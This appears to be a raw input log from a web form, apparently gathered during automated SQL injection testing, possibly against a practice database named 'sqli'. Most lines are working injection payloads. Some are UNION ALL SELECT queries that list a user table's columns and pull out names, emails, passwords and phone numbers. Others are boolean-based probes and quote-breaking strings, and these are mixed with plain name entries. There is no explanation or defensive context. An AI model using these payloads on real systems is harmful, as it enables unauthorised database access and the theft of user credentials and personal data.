1' UNION ALL SELECT CONCAT(0x7170766a71,JSON_ARRAYAGG(CONCAT_WS(0x6169626d6e6f,column_name,column_type)),0x717a766271),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x75736572 AND table_schema=0x73716c69# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,IFNULL(CAST(column_name AS NCHAR),0x20),0x6169626d6e6f,IFNULL(CAST(column_type AS NCHAR),0x20),0x717a766271),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x75736572 AND table_schema=0x73716c69# plain
1 plain
1' UNION ALL SELECT CONCAT(0x7170766a71,JSON_ARRAYAGG(CONCAT_WS(0x6169626d6e6f,name)),0x717a766271),NULL,NULL,NULL FROM sqli.`user` ORDER BY name# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,IFNULL(CAST(name AS NCHAR),0x20),0x717a766271),NULL,NULL,NULL FROM sqli.`user` ORDER BY name# plain
1 plain
1' UNION ALL SELECT CONCAT(0x7170766a71,JSON_ARRAYAGG(CONCAT_WS(0x6169626d6e6f,email)),0x717a766271),NULL,NULL,NULL FROM sqli.`user` ORDER BY email# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,IFNULL(CAST(email AS NCHAR),0x20),0x717a766271),NULL,NULL,NULL FROM sqli.`user` ORDER BY email# plain
1 plain
1' UNION ALL SELECT CONCAT(0x7170766a71,JSON_ARRAYAGG(CONCAT_WS(0x6169626d6e6f,pass)),0x717a766271),NULL,NULL,NULL FROM sqli.`user` ORDER BY pass# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,IFNULL(CAST(pass AS NCHAR),0x20),0x717a766271),NULL,NULL,NULL FROM sqli.`user` ORDER BY pass# plain
1 plain
1' UNION ALL SELECT CONCAT(0x7170766a71,JSON_ARRAYAGG(CONCAT_WS(0x6169626d6e6f,phone)),0x717a766271),NULL,NULL,NULL FROM sqli.`user` ORDER BY phone# plain
1' UNION ALL SELECT CONCAT(0x7170766a71,IFNULL(CAST(phone AS NCHAR),0x20),0x717a766271),NULL,NULL,NULL FROM sqli.`user` ORDER BY phone# plain
Vanshit plain
Vanshit plain
Vanshit plain
Vanshit plain
Abhinav plain
Abhinav plain
Vanshit plain
Vanshit plain
Vanshit plain
Vanshit plain
Abhinav plain
Vanshit plain
Vanshit plain
Vanshit plain
vansh plain
vansh plain
1 plain
1 plain
4502 plain
1'(".,..(.( plain
1'UfzyGQ<'">oIMUXs plain
1) AND 3673=6491 AND (9484=9484 plain
1) AND 6275=6275 AND (5525=5525 plain
1 AND 4697=8059 plain
1 AND 6275=6275 plain
1 AND 8518=4156-- xpsC plain
1 AND 6275=6275-- iTgl plain
1') AND 3367=3961 AND ('HkjS'='HkjS plain
1') AND 6275=6275 AND ('ytSB'='ytSB plain
1' AND 3437=8831 AND 'pGnF'='pGnF plain
vansh plain
vansh plain
vansh plain